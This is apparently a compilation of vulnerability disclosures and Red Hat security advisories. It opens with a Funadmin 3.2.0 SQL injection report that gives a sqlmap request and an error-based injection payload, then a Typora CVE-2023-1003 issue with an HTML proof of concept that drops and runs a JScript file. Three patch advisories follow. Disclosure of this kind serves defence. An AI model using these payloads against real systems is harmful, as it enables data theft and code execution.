Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/columns.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in table.php columns-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  
  
Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\table.php#columns method  
  

Get the id directly and splice it into the sql statement

Vulnerability recurrence  
sqlmap poc save as txt  
GET /databases/table/columns?id=* HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close  
python sqlmap.py -r poc.txt  
  
GET /databases/table/columns?id='+AND+GTID_SUBSET(CONCAT(0x12,(SELECT+(ELT(6415=6415,1))),user()),6415)--+qRTY HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close

CVE-2023-24780: Database management plug-in table.php columns-sql injection vulnerability · Issue #6 · funadmin/funadmin

A vulnerability, which was classified as critical, was found in Typora up to 1.5.5. Affected is an unknown function of the component WSH JScript Handler. The manipulation leads to code injection. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.8 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221736.

Although typora filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.


<html\>
<script\>
    var blob \= new Blob(\['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'\],{type:'application/js'});
    var a \= document.createElement('a');
    a.href \= window.URL.createObjectURL(blob);
    a.download \=  'poc.js';
    a.click();
</script\>
</html\>


<a href\="http://127.0.0.1:8000/poc.js" download\="poc.js"\>CLICK~~</a\>

CVE-2023-1003: Typora on Windows fails to properly filter WSH JScript, which may result in code execution · Issue #5623 · typora/typora-issues

Red Hat Security Advisory 2023-1101-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1101-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1101  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-4378  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 7) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server (v. 7):

Source:  
kpatch-patch-3_10_0-1160_76_1-1-3.el7.src.rpm  
kpatch-patch-3_10_0-1160_80_1-1-2.el7.src.rpm  
kpatch-patch-3_10_0-1160_81_1-1-2.el7.src.rpm  
kpatch-patch-3_10_0-1160_83_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1160_76_1-1-3.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_76_1-debuginfo-1-3.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_80_1-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_80_1-debuginfo-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_81_1-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_81_1-debuginfo-1-2.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_83_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1160_83_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1160_76_1-1-3.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_76_1-debuginfo-1-3.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_80_1-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_80_1-debuginfo-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_81_1-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_81_1-debuginfo-1-2.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_83_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1160_83_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuFdzjgjWX9erEAQjrcxAAiTCE6ZvPRR87Emuo/U+WaIiQ4diaGR/f  
r7VmU1XzneG4oQ8mtgWIMrwdMVXZjyTfxy/uNpHMAqVZsSzHaNscBtFWkYXsDfsK  
tTOpx4jSLPdlzprpGntL55Zp6EKwZ2aWMnu4quG3yCq7m4YnpBC3kf/dui/x8pzq  
57Yfm/m6XrYy8sWxsh+hNROsa7NQR8yVILOjHfx6XEgFu3LumZD6/GMTiA+klYcS  
8Ne7H7QQ10XuAY6iwfLttZUvDBNgzG/kI32B0zdQgH6JuQHoqWdUzkXQYPfH0c75  
HaHJ6PprIr9GJI1GXkgKNrmOU1K7cw7g8Xki/TIul3DemrOKpk3KDRXq0WCo6z8P  
wBlqGbV9MVKZ2uMjp+yV+IOcNXY4g6Iye48jC1+jKyQS5fkHXscKttVQ5NjoPGH9  
0LWN0SF4QGjriUoAVr3VL80baapru4cHX7RjG7lWCZLBhIw2n3QfeafnXoE+ongG  
tCD5/7HFIs7CcaymK1fYP+zbQn/Jr2cfNyRycSPQj5HXJ3z51HQZge14NfTQJQQv  
PzaPPN90lx+eB1f/+8bQ6S8y2qpUEnKoHHvtLw1ivxw/3+HtmcABFmx8bN6dFKgb  
3eVA3IX9yQpkw5oV0K455iHDAXazt8/XKeStRG12vvBuqHDQOwQ79IsNDuObMCX6  
5Xyu1BzYCsI=Z0I6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1101-01

Red Hat Security Advisory 2023-1102-01 - MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: rh-mysql80-mysql security update  
Advisory ID:       RHSA-2023:1102-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1102  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-21594 CVE-2022-21599 CVE-2022-21604  
                   CVE-2022-21608 CVE-2022-21611 CVE-2022-21617  
                   CVE-2022-21625 CVE-2022-21632 CVE-2022-21633  
                   CVE-2022-21637 CVE-2022-21640 CVE-2022-39400  
                   CVE-2022-39408 CVE-2022-39410 CVE-2023-21836  
                   CVE-2023-21863 CVE-2023-21864 CVE-2023-21865  
                   CVE-2023-21867 CVE-2023-21868 CVE-2023-21869  
                   CVE-2023-21870 CVE-2023-21871 CVE-2023-21873  
                   CVE-2023-21874 CVE-2023-21875 CVE-2023-21876  
                   CVE-2023-21877 CVE-2023-21878 CVE-2023-21879  
                   CVE-2023-21880 CVE-2023-21881 CVE-2023-21882  
                   CVE-2023-21883 CVE-2023-21887  
====================================================================  
1. Summary:

An update for rh-mysql80-mysql is now available for Red Hat Software  
Collections.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - ppc64le, s390x, x86_64  
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

MySQL is a multi-user, multi-threaded SQL database server. It consists of  
the MySQL server daemon, mysqld, and many client programs.

The following packages have been upgraded to a later upstream version:  
rh-mysql80-mysql (8.0.32). (BZ#2142971, BZ#2162319)

Security Fix(es):

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21594)

* mysql: Server: Stored Procedure unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21599)

* mysql: InnoDB unspecified vulnerability (CPU Oct 2022) (CVE-2022-21604)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21608)

* mysql: InnoDB unspecified vulnerability (CPU Oct 2022) (CVE-2022-21611)

* mysql: Server: Connection Handling unspecified vulnerability (CPU Oct  
2022) (CVE-2022-21617)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21625)

* mysql: Server: Security: Privileges unspecified vulnerability (CPU Oct  
2022) (CVE-2022-21632)

* mysql: Server: Replication unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21633)

* mysql: InnoDB unspecified vulnerability (CPU Oct 2022) (CVE-2022-21637)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-21640)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-39400)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-39408)

* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
(CVE-2022-39410)

* mysql: Server: DML unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21836)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21863)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21864)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21865)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21867)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21868)

* mysql: InnoDB unspecified vulnerability (CPU Jan 2023) (CVE-2023-21869)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21870)

* mysql: InnoDB unspecified vulnerability (CPU Jan 2023) (CVE-2023-21871)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21873)

* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan  
2023) (CVE-2023-21875)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21876)

* mysql: InnoDB unspecified vulnerability (CPU Jan 2023) (CVE-2023-21877)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21878)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21879)

* mysql: InnoDB unspecified vulnerability (CPU Jan 2023) (CVE-2023-21880)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21881)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21883)

* mysql: Server: GIS unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21887)

* mysql: Server: Thread Pooling unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21874)

* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
(CVE-2023-21882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the MySQL server daemon (mysqld) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2142861 - CVE-2022-21594 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142863 - CVE-2022-21599 mysql: Server: Stored Procedure unspecified vulnerability (CPU Oct 2022)  
2142865 - CVE-2022-21604 mysql: InnoDB unspecified vulnerability (CPU Oct 2022)  
2142868 - CVE-2022-21608 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142869 - CVE-2022-21611 mysql: InnoDB unspecified vulnerability (CPU Oct 2022)  
2142870 - CVE-2022-21617 mysql: Server: Connection Handling unspecified vulnerability (CPU Oct 2022)  
2142871 - CVE-2022-21625 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142872 - CVE-2022-21632 mysql: Server: Security: Privileges unspecified vulnerability (CPU Oct 2022)  
2142873 - CVE-2022-21633 mysql: Server: Replication unspecified vulnerability (CPU Oct 2022)  
2142875 - CVE-2022-21637 mysql: InnoDB unspecified vulnerability (CPU Oct 2022)  
2142877 - CVE-2022-21640 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142879 - CVE-2022-39400 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142880 - CVE-2022-39408 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2142881 - CVE-2022-39410 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2022)  
2162268 - CVE-2023-21836 mysql: Server: DML unspecified vulnerability (CPU Jan 2023)  
2162270 - CVE-2023-21863 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162271 - CVE-2023-21864 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162272 - CVE-2023-21865 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162274 - CVE-2023-21867 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162275 - CVE-2023-21868 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162276 - CVE-2023-21869 mysql: InnoDB unspecified vulnerability (CPU Jan 2023)  
2162277 - CVE-2023-21870 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162278 - CVE-2023-21871 mysql: InnoDB unspecified vulnerability (CPU Jan 2023)  
2162280 - CVE-2023-21873 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162281 - CVE-2023-21874 mysql: Server: Thread Pooling unspecified vulnerability (CPU Jan 2023)  
2162282 - CVE-2023-21875 mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2023)  
2162283 - CVE-2023-21876 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162284 - CVE-2023-21877 mysql: InnoDB unspecified vulnerability (CPU Jan 2023)  
2162285 - CVE-2023-21878 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162286 - CVE-2023-21879 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162287 - CVE-2023-21880 mysql: InnoDB unspecified vulnerability (CPU Jan 2023)  
2162288 - CVE-2023-21881 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162289 - CVE-2023-21882 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162290 - CVE-2023-21883 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2023)  
2162291 - CVE-2023-21887 mysql: Server: GIS unspecified vulnerability (CPU Jan 2023)

6. Package List:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-mysql80-mysql-8.0.32-1.el7.src.rpm

ppc64le:  
rh-mysql80-mysql-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-common-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-config-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-config-syspaths-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-debuginfo-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-devel-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-errmsg-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-icu-data-files-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-server-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-server-syspaths-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-syspaths-8.0.32-1.el7.ppc64le.rpm  
rh-mysql80-mysql-test-8.0.32-1.el7.ppc64le.rpm

s390x:  
rh-mysql80-mysql-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-common-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-config-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-config-syspaths-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-debuginfo-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-devel-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-errmsg-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-icu-data-files-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-server-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-server-syspaths-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-syspaths-8.0.32-1.el7.s390x.rpm  
rh-mysql80-mysql-test-8.0.32-1.el7.s390x.rpm

x86_64:  
rh-mysql80-mysql-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-common-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-config-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-config-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-debuginfo-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-devel-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-errmsg-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-icu-data-files-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-server-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-server-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-test-8.0.32-1.el7.x86_64.rpm

Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-mysql80-mysql-8.0.32-1.el7.src.rpm

x86_64:  
rh-mysql80-mysql-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-common-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-config-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-config-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-debuginfo-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-devel-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-errmsg-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-icu-data-files-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-server-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-server-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-syspaths-8.0.32-1.el7.x86_64.rpm  
rh-mysql80-mysql-test-8.0.32-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21594  
https://access.redhat.com/security/cve/CVE-2022-21599  
https://access.redhat.com/security/cve/CVE-2022-21604  
https://access.redhat.com/security/cve/CVE-2022-21608  
https://access.redhat.com/security/cve/CVE-2022-21611  
https://access.redhat.com/security/cve/CVE-2022-21617  
https://access.redhat.com/security/cve/CVE-2022-21625  
https://access.redhat.com/security/cve/CVE-2022-21632  
https://access.redhat.com/security/cve/CVE-2022-21633  
https://access.redhat.com/security/cve/CVE-2022-21637  
https://access.redhat.com/security/cve/CVE-2022-21640  
https://access.redhat.com/security/cve/CVE-2022-39400  
https://access.redhat.com/security/cve/CVE-2022-39408  
https://access.redhat.com/security/cve/CVE-2022-39410  
https://access.redhat.com/security/cve/CVE-2023-21836  
https://access.redhat.com/security/cve/CVE-2023-21863  
https://access.redhat.com/security/cve/CVE-2023-21864  
https://access.redhat.com/security/cve/CVE-2023-21865  
https://access.redhat.com/security/cve/CVE-2023-21867  
https://access.redhat.com/security/cve/CVE-2023-21868  
https://access.redhat.com/security/cve/CVE-2023-21869  
https://access.redhat.com/security/cve/CVE-2023-21870  
https://access.redhat.com/security/cve/CVE-2023-21871  
https://access.redhat.com/security/cve/CVE-2023-21873  
https://access.redhat.com/security/cve/CVE-2023-21874  
https://access.redhat.com/security/cve/CVE-2023-21875  
https://access.redhat.com/security/cve/CVE-2023-21876  
https://access.redhat.com/security/cve/CVE-2023-21877  
https://access.redhat.com/security/cve/CVE-2023-21878  
https://access.redhat.com/security/cve/CVE-2023-21879  
https://access.redhat.com/security/cve/CVE-2023-21880  
https://access.redhat.com/security/cve/CVE-2023-21881  
https://access.redhat.com/security/cve/CVE-2023-21882  
https://access.redhat.com/security/cve/CVE-2023-21883  
https://access.redhat.com/security/cve/CVE-2023-21887  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuG9zjgjWX9erEAQiCZg//RX3U55Hsa1yStZrZLZLP+nt+h0/LlXRj  
4dixNgz2Zvy9rMQ6mTLuxuxcFDLraLUOLKWi8ZDe3iuZfU5bc+wkyrkdnEBMoZW5  
yidR3Qz8hBBU6CD1VB9bTPmxVPsKlnw272h943XbOUH4JtZvRGTf3O8xpuS0WrEL  
ZGq9SJCDv7MQCL5JhAMODdrED/yFlW5I17CWhRoSi1u8nBW7qeO5Kig/sNFpJQtz  
BYegMWTJx/WFQfCRn0nGck0G8WJkQF3j0hCi+FHDSyHIgYG8XZ5sQX/3Nb6YmV0Q  
d9mQY71oI5ix5mFNdgOAl/xpVKqkV4Ea3sebTB2GGq6N61jRBD+VKy6iiZoKI4S4  
rVj9VIcKvO4gY6Fnag1wd9Kt/iZLbMNBPtLmXjhW8D6YSfiBSieS5Y7BYMSCdyTC  
QwkQPFEy+NNaS4JcbIo5mbth7YshGue3HKT2Ci0z4czP8UxPiVd3+XfRnZcWX6J1  
TyN5qSOXot66HoGWKi4lfDMaM3JHvclVZ0xZc2kUA+tdgzlkY/EWJhFBzJQmpTaV  
Gg5JGAkyaMy8kUWEkvcNFJ/+kztHt2XxofxbDZhqKR9DNqHwbkC6lDfB9I3EIPg0  
LjVBxhMI2o5zReVEeYr8onJSdn6GaF2KLpesPzKm3Elrr2c95pyukcwERJDIJjHm  
n0kK9NnNg94:z9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1102-01

Red Hat Security Advisory 2023-1093-01 - The pesign packages provide the pesign utility for signing UEFI binaries as well as other associated tools. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: pesign security update  
Advisory ID:       RHSA-2023:1093-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1093  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-3560  
====================================================================  
1. Summary:

An update for pesign is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The pesign packages provide the pesign utility for signing UEFI binaries as  
well as other associated tools.

Security Fix(es):

* pesign: Local privilege escalation on pesign systemd service  
(CVE-2022-3560)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2135420 - CVE-2022-3560 pesign: Local privilege escalation on pesign systemd service

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
pesign-0.109-11.el7_9.src.rpm

x86_64:  
pesign-0.109-11.el7_9.x86_64.rpm  
pesign-debuginfo-0.109-11.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
pesign-0.109-11.el7_9.src.rpm

x86_64:  
pesign-0.109-11.el7_9.x86_64.rpm  
pesign-debuginfo-0.109-11.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
